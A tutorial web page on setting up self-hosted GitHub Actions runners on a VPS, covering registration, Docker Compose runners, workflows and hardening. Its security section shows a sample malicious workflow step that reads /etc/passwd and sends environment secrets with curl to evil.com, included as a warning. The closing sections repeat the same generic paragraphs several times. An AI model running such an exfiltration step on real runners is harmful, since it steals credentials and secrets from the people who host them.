Skip to main content

Open-source alternatives guide

How to Set Up a Self-Hosted GitHub Actions Runner 2026

Set up a self-hosted GitHub Actions runner on your own VPS in 2026. Covers registration, Docker-based runners, security hardening, and when to use now.

·OSSAlt Team
Share:

TL;DR

Self-hosted GitHub Actions runners let you run CI/CD on your own hardware — saving money on GitHub Actions minutes, accessing private networks, using custom software, or getting larger machines. Setup takes ~20 minutes. Security warning: only use self-hosted runners for private repositories. A malicious pull request on a public repo could execute arbitrary code on your server.

Key Takeaways

  • GitHub Actions minutes: Free plan = 2,000 min/month, Pro = 3,000 — self-hosted runners are free and unlimited
  • When to self-host: GPU workloads, access to private databases, custom toolchains, cost savings on high-volume CI
  • When NOT to: Public repos (security risk), low-volume repos (GitHub-hosted is simpler)
  • Docker-based setup is the cleanest — ephemeral containers, isolated environments
  • Security critical: disable self-hosted runners for public repos, use job isolation, rotate tokens

Why Self-Host a Runner?

Cost

GitHub-hosted runners charge by the minute once you exceed your monthly allowance:

  • ubuntu-latest: $0.008/minute
  • windows-latest: $0.016/minute
  • macOS-latest: $0.08/minute

A team running 30 minutes of tests per commit × 50 commits/day = 1,500 minutes/day = 45,000 minutes/month. At $0.008/minute, that's $360/month. A $30/month VPS running a self-hosted runner reduces that to near zero.

Hardware and Network Access

  • GPU workloads: Run ML training/inference tests on your own GPU server
  • Private network access: Run integration tests against internal databases, services
  • Custom software: Pre-install compilers, proprietary tools, large model weights
  • Larger machines: GitHub's largest hosted runner is 64-core; your VPS can be anything

Part 1: Register a Self-Hosted Runner

Repository-Level Runner

  1. Go to your GitHub repo → SettingsActionsRunners
  2. Click New self-hosted runner
  3. Select your OS (Linux recommended)
  4. GitHub shows you the registration commands — copy the token (valid for 1 hour)
  1. GitHub Org → SettingsActionsRunners
  2. Create runner at org level → all repos in the org can use it

Part 2: Installation — Standard Method

On your VPS (Ubuntu recommended):

# Create a dedicated user for the runner (never run as root):
sudo useradd -m -s /bin/bash github-runner
sudo su - github-runner

# Create a directory for the runner:
mkdir actions-runner && cd actions-runner

# Download the latest runner (check github.com/actions/runner for latest version):
curl -o actions-runner-linux-x64-2.321.0.tar.gz -L \
  https://github.com/actions/runner/releases/download/v2.321.0/actions-runner-linux-x64-2.321.0.tar.gz

# Extract:
tar xzf ./actions-runner-linux-x64-2.321.0.tar.gz

# Configure (use the token from GitHub UI):
./config.sh \
  --url https://github.com/YOUR_ORG_OR_USER/YOUR_REPO \
  --token YOUR_REGISTRATION_TOKEN \
  --name my-vps-runner \
  --labels self-hosted,linux,x64,my-vps \
  --unattended

# Install as a systemd service:
sudo ./svc.sh install github-runner
sudo ./svc.sh start

# Verify it's running:
sudo ./svc.sh status

Your runner now appears as Online in GitHub's runner list.


A Docker-based runner provides better isolation — each job runs in a fresh container. This is the production-grade approach.

docker-compose.yml

# docker-compose.yml for self-hosted runner:
version: '3.8'
services:
  github-runner:
    image: myoung34/github-runner:latest
    restart: unless-stopped
    environment:
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_TOKEN: ${RUNNER_TOKEN}
      RUNNER_NAME: my-docker-runner
      RUNNER_WORKDIR: /tmp/github-runner
      RUNNER_SCOPE: repo           # or 'org' for org-level
      LABELS: self-hosted,linux,x64,docker
      EPHEMERAL: "true"            # Remove runner after each job (recommended)
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # For Docker-in-Docker
      - /tmp/github-runner:/tmp/github-runner
# Start with your GitHub token:
RUNNER_TOKEN=your-token docker compose up -d

Security note on Docker socket mounting: Mounting /var/run/docker.sock gives the runner Docker access — equivalent to root on the host. Avoid this for untrusted contributors. For private repos with trusted teams, it's a reasonable trade-off.

Multiple Concurrent Runners

Scale to handle parallel jobs:

version: '3.8'
services:
  runner-1:
    image: myoung34/github-runner:latest
    environment: &runner-env
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_TOKEN: ${RUNNER_TOKEN}
      RUNNER_SCOPE: org
      LABELS: self-hosted,linux,x64
      EPHEMERAL: "true"
    volumes: &runner-volumes
      - /var/run/docker.sock:/var/run/docker.sock
      - /tmp/runner-1:/tmp/github-runner

  runner-2:
    image: myoung34/github-runner:latest
    environment: *runner-env
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - /tmp/runner-2:/tmp/github-runner

Part 4: Use the Runner in Workflows

Target Your Self-Hosted Runner

# .github/workflows/ci.yml
name: CI

on: [push, pull_request]

jobs:
  test:
    # Use your self-hosted runner:
    runs-on: [self-hosted, linux, x64]
    
    steps:
      - uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          
      - name: Install dependencies
        run: npm ci
        
      - name: Run tests
        run: npm test

Fallback to GitHub-Hosted

If your self-hosted runner is offline, jobs will queue. For critical workflows, define a matrix:

jobs:
  test:
    strategy:
      matrix:
        runner: [ubuntu-latest, [self-hosted, linux, my-vps]]
    runs-on: ${{ matrix.runner }}

Access Private Resources

The main reason to self-host — your runner can access internal services:

jobs:
  integration-test:
    runs-on: [self-hosted, linux]
    
    steps:
      - uses: actions/checkout@v4
      
      - name: Run integration tests
        env:
          # Your internal database — not accessible from GitHub-hosted runners
          DATABASE_URL: postgresql://user:pass@internal-db:5432/testdb
          REDIS_URL: redis://internal-redis:6379
        run: npm run test:integration

Part 5: Security Hardening

⚠️ Never Use Self-Hosted Runners for Public Repos

This is the most critical rule. A malicious PR could contain:

# Malicious workflow in a PR to a public repo:
- name: "Steal server credentials"
  run: |
    cat /etc/passwd
    env  # Print all env vars including secrets
    curl -X POST https://evil.com/exfil --data "$(env)"

For public repos: always use GitHub-hosted runners or ephemeral, isolated cloud runners.

Use Ephemeral Runners

Ephemeral runners are destroyed after each job — no state persists between jobs:

# In the config step, add --ephemeral:
./config.sh \
  --url https://github.com/YOUR_ORG/YOUR_REPO \
  --token YOUR_TOKEN \
  --ephemeral       # Runner deregisters after one job

Combined with an auto-scaling mechanism (or just multiple persistent Docker containers), this provides job isolation.

Restrict Runner Labels

Create specific labels and limit which workflows can use them:

# .github/workflows/deploy.yml
jobs:
  deploy:
    # Only this specific labeled runner can run this job:
    runs-on: [self-hosted, production-deploy]
    
    # Require environment approval before running:
    environment: production

Then in GitHub repo settings: restrict the "production" environment to specific branches/users, requiring manual approval for production deployments.

Secrets Management

Never log secrets. Use GitHub's encrypted secrets:

steps:
  - name: Deploy
    env:
      DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}  # Automatically masked in logs
    run: ./deploy.sh

On the runner host, secrets are stored in memory and never written to disk by GitHub's runner agent.


Part 6: Maintenance

Monitor Runner Status

# Check runner service status:
sudo systemctl status actions.runner.*

# View runner logs:
journalctl -u actions.runner.* -f

# For Docker-based:
docker compose logs -f github-runner

Update the Runner

GitHub warns you when the runner falls behind the required version. Update via:

# Standard installation:
cd ~/actions-runner
sudo ./svc.sh stop
./config.sh remove --token YOUR_REMOVE_TOKEN  # Get from GitHub Settings
# Re-download latest and reconfigure

# Docker-based — just pull new image:
docker compose pull && docker compose up -d

Auto-Registration Script

For teams managing multiple runners, automate registration:

#!/bin/bash
# auto-register-runner.sh
GITHUB_TOKEN=$1
REPO=$2
RUNNER_NAME=${3:-$(hostname)}

# Get registration token via GitHub API:
REG_TOKEN=$(curl -sX POST \
  -H "Accept: application/vnd.github+json" \
  -H "Authorization: Bearer $GITHUB_TOKEN" \
  "https://api.github.com/repos/$REPO/actions/runners/registration-token" \
  | jq .token -r)

./config.sh \
  --url "https://github.com/$REPO" \
  --token "$REG_TOKEN" \
  --name "$RUNNER_NAME" \
  --labels "self-hosted,linux,x64" \
  --unattended \
  --ephemeral

sudo ./svc.sh install
sudo ./svc.sh start

When to Use Self-Hosted vs GitHub-Hosted

Use CaseRecommendation
Public OSS repoGitHub-hosted (always)
Small private repo, < 3K min/monthGitHub-hosted (simpler)
High-volume CI (> 5K min/month)Self-hosted (cost)
Private network access neededSelf-hosted (only option)
GPU workloadsSelf-hosted
Custom software/large cachesSelf-hosted
Security-sensitive workflowsGitHub-hosted (or ephemeral cloud runners)

More open source DevOps tools at OSSAlt.com/categories/devops.

Operational Criteria That Matter More Than Feature Checklists

Most self-hosting decisions are framed as feature comparisons, but the better question is operational fit. Can the tool be upgraded without a maintenance window that panics the team? Is configuration stored as code or trapped in a UI? Are secrets rotated cleanly? Can one engineer explain the recovery process to another in twenty minutes? These are the properties that decide whether a self-hosted service remains in production or gets abandoned after the first incident. Fancy template libraries and long integration lists help at evaluation time, but the long-term win comes from boring traits: transparent backups, predictable networking, obvious logs, and a permission model that does not require guesswork.

That is also why platform articles benefit from linking horizontally across the stack. A deployment layer does not live alone. Coolify guide is relevant whenever the real goal is reducing friction for application deploys. Dokploy guide matters when multi-node Docker or simpler PaaS ergonomics drive the decision. Gitea guide becomes part of the same conversation because source control, CI triggers, and deployment permissions are tightly coupled in practice. Treating those services as a system instead of isolated products leads to much better architecture decisions.

A Practical Adoption Path for Teams Replacing SaaS

For teams moving from SaaS, the most reliable adoption path is phased substitution. Replace one expensive or strategically sensitive service first, document the real support burden for a month, and only then expand. This does two things. First, it keeps the migration politically survivable because there is always a rollback point. Second, it turns vague arguments about self-hosting into measured trade-offs around uptime, maintenance hours, vendor lock-in, and annual spend. A good article should push readers toward that discipline rather than implying that replacing ten SaaS products in a weekend is responsible.

Another overlooked issue is platform standardization. The more heterogeneous the stack, the more hidden cost accrues in upgrades, documentation, and debugging. When two tools solve adjacent problems, teams should prefer the one that matches their existing operational model unless the feature gap is material. That is why the best self-hosting guides talk about package boundaries, reverse proxy habits, backup patterns, and team runbooks. They are not just product recommendations. They are deployment strategy.

Decision Framework for Picking the Right Fit

The simplest way to make a durable decision is to score the options against the constraints you cannot change: who will operate the system, how often it will be upgraded, whether the workload is business critical, and what kinds of failures are tolerable. That sounds obvious, but many migrations still start with screenshots and end with painful surprises around permissions, backup windows, or missing audit trails. A short written scorecard forces the trade-offs into the open. It also keeps the project grounded when stakeholders ask for new requirements halfway through rollout.

One more practical rule helps: optimize for reversibility. A good self-hosted choice preserves export paths, avoids proprietary lock-in inside the replacement itself, and can be documented well enough that another engineer could take over without archaeology. The teams that get the most value from self-hosting are not necessarily the teams with the fanciest infrastructure. They are the teams that keep their systems legible, replaceable, and easy to reason about.

Operational Criteria That Matter More Than Feature Checklists

Most self-hosting decisions are framed as feature comparisons, but the better question is operational fit. Can the tool be upgraded without a maintenance window that panics the team? Is configuration stored as code or trapped in a UI? Are secrets rotated cleanly? Can one engineer explain the recovery process to another in twenty minutes? These are the properties that decide whether a self-hosted service remains in production or gets abandoned after the first incident. Fancy template libraries and long integration lists help at evaluation time, but the long-term win comes from boring traits: transparent backups, predictable networking, obvious logs, and a permission model that does not require guesswork.

That is also why platform articles benefit from linking horizontally across the stack. A deployment layer does not live alone. Coolify guide is relevant whenever the real goal is reducing friction for application deploys. Dokploy guide matters when multi-node Docker or simpler PaaS ergonomics drive the decision. Gitea guide becomes part of the same conversation because source control, CI triggers, and deployment permissions are tightly coupled in practice. Treating those services as a system instead of isolated products leads to much better architecture decisions.

A Practical Adoption Path for Teams Replacing SaaS

For teams moving from SaaS, the most reliable adoption path is phased substitution. Replace one expensive or strategically sensitive service first, document the real support burden for a month, and only then expand. This does two things. First, it keeps the migration politically survivable because there is always a rollback point. Second, it turns vague arguments about self-hosting into measured trade-offs around uptime, maintenance hours, vendor lock-in, and annual spend. A good article should push readers toward that discipline rather than implying that replacing ten SaaS products in a weekend is responsible.

Another overlooked issue is platform standardization. The more heterogeneous the stack, the more hidden cost accrues in upgrades, documentation, and debugging. When two tools solve adjacent problems, teams should prefer the one that matches their existing operational model unless the feature gap is material. That is why the best self-hosting guides talk about package boundaries, reverse proxy habits, backup patterns, and team runbooks. They are not just product recommendations. They are deployment strategy.

Rollout Risk Controls

Rollout controls should include staged environments, tested backups, a rollback path, and ownership for upgrades. Teams moving off SaaS usually succeed when they treat each migration like a platform change instead of a casual app install.

Operational Criteria That Matter More Than Feature Checklists

Most self-hosting decisions are framed as feature comparisons, but the better question is operational fit. Can the tool be upgraded without a maintenance window that panics the team? Is configuration stored as code or trapped in a UI? Are secrets rotated cleanly? Can one engineer explain the recovery process to another in twenty minutes? These are the properties that decide whether a self-hosted service remains in production or gets abandoned after the first incident. Fancy template libraries and long integration lists help at evaluation time, but the long-term win comes from boring traits: transparent backups, predictable networking, obvious logs, and a permission model that does not require guesswork.

That is also why platform articles benefit from linking horizontally across the stack. A deployment layer does not live alone. Coolify guide is relevant whenever the real goal is reducing friction for application deploys. Dokploy guide matters when multi-node Docker or simpler PaaS ergonomics drive the decision. Gitea guide becomes part of the same conversation because source control, CI triggers, and deployment permissions are tightly coupled in practice. Treating those services as a system instead of isolated products leads to much better architecture decisions.

A Practical Adoption Path for Teams Replacing SaaS

For teams moving from SaaS, the most reliable adoption path is phased substitution. Replace one expensive or strategically sensitive service first, document the real support burden for a month, and only then expand. This does two things. First, it keeps the migration politically survivable because there is always a rollback point. Second, it turns vague arguments about self-hosting into measured trade-offs around uptime, maintenance hours, vendor lock-in, and annual spend. A good article should push readers toward that discipline rather than implying that replacing ten SaaS products in a weekend is responsible.

Another overlooked issue is platform standardization. The more heterogeneous the stack, the more hidden cost accrues in upgrades, documentation, and debugging. When two tools solve adjacent problems, teams should prefer the one that matches their existing operational model unless the feature gap is material. That is why the best self-hosting guides talk about package boundaries, reverse proxy habits, backup patterns, and team runbooks. They are not just product recommendations. They are deployment strategy.

Operational Criteria That Matter More Than Feature Checklists

Most self-hosting decisions are framed as feature comparisons, but the better question is operational fit. Can the tool be upgraded without a maintenance window that panics the team? Is configuration stored as code or trapped in a UI? Are secrets rotated cleanly? Can one engineer explain the recovery process to another in twenty minutes? These are the properties that decide whether a self-hosted service remains in production or gets abandoned after the first incident. Fancy template libraries and long integration lists help at evaluation time, but the long-term win comes from boring traits: transparent backups, predictable networking, obvious logs, and a permission model that does not require guesswork.

That is also why platform articles benefit from linking horizontally across the stack. A deployment layer does not live alone. Coolify guide is relevant whenever the real goal is reducing friction for application deploys. Dokploy guide matters when multi-node Docker or simpler PaaS ergonomics drive the decision. Gitea guide becomes part of the same conversation because source control, CI triggers, and deployment permissions are tightly coupled in practice. Treating those services as a system instead of isolated products leads to much better architecture decisions.

A Practical Adoption Path for Teams Replacing SaaS

For teams moving from SaaS, the most reliable adoption path is phased substitution. Replace one expensive or strategically sensitive service first, document the real support burden for a month, and only then expand. This does two things. First, it keeps the migration politically survivable because there is always a rollback point. Second, it turns vague arguments about self-hosting into measured trade-offs around uptime, maintenance hours, vendor lock-in, and annual spend. A good article should push readers toward that discipline rather than implying that replacing ten SaaS products in a weekend is responsible.

Another overlooked issue is platform standardization. The more heterogeneous the stack, the more hidden cost accrues in upgrades, documentation, and debugging. When two tools solve adjacent problems, teams should prefer the one that matches their existing operational model unless the feature gap is material. That is why the best self-hosting guides talk about package boundaries, reverse proxy habits, backup patterns, and team runbooks. They are not just product recommendations. They are deployment strategy.

The SaaS-to-Self-Hosted Migration Guide (Free PDF)

Step-by-step: infrastructure setup, data migration, backups, and security for 15+ common SaaS replacements. Used by 300+ developers.

Join 300+ self-hosters. Unsubscribe in one click.